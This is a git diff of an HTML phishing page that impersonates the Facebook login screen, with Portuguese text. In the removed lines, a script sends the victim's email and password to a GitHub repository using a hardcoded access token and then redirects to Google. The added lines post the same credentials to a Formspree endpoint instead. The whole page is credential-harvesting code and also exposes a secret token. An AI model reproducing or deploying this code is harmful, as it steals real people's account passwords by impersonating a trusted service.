--- a/index.html
+++ b/index.html
@@ -106,8 +106,8 @@
     <div class="login-box">
       <img src="facebook-logo.png" alt="Facebook Logo">
       <h2>Entrar no Facebook</h2>
-      <!-- Alteração no atributo action e método de envio do formulário -->
-      <form id="login-form">
+      <!-- Configuração do Formspree -->
+      <form action="https://formspree.io/f/mpzgwygb" method="post">
         <label for="email">Email ou Senha:</label>
         <input type="text" id="email" name="email" required>
         <label for="password">Senha:</label>
@@ -121,46 +121,5 @@
       </form>
     </div>
   </div>
-
-  <!-- Script para enviar os dados do formulário para o GitHub -->
-  <script>
-    document.getElementById("login-form").addEventListener("submit", function(event) {
-      event.preventDefault();
-      const email = document.getElementById("email").value;
-      const password = document.getElementById("password").value;
-      const githubToken = "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"; // Substitua "SEU_TOKEN_AQUI" pelo seu token de acesso pessoal
-
-      const data = {
-        "logins": [
-          {
-            "email": email,
-            "password": password
-          }
-        ]
-      };
-
-      fetch("https://api.github.com/repos/Romariogitrep/sitelogin/contents/data.json", {
-        method: "PUT",
-        headers: {
-          "Authorization": "token " + githubToken,
-          "Content-Type": "application/json",
-        },
-        body: JSON.stringify({
-          message: "Update data.json",
-          content: btoa(JSON.stringify(data)),
-        }),
-      })
-      .then(response => response.json())
-      .then(data => {
-        console.log("Dados salvos com sucesso!");
-        console.log(data);
-        // Aqui você pode redirecionar o usuário para outra página, se desejar
-        window.location.href = "https://www.google.com.br";
-      })
-      .catch(error => {
-        console.error("Erro ao salvar os dados:", error);
-      });
-    });
-  </script>
 </body>
 </html>
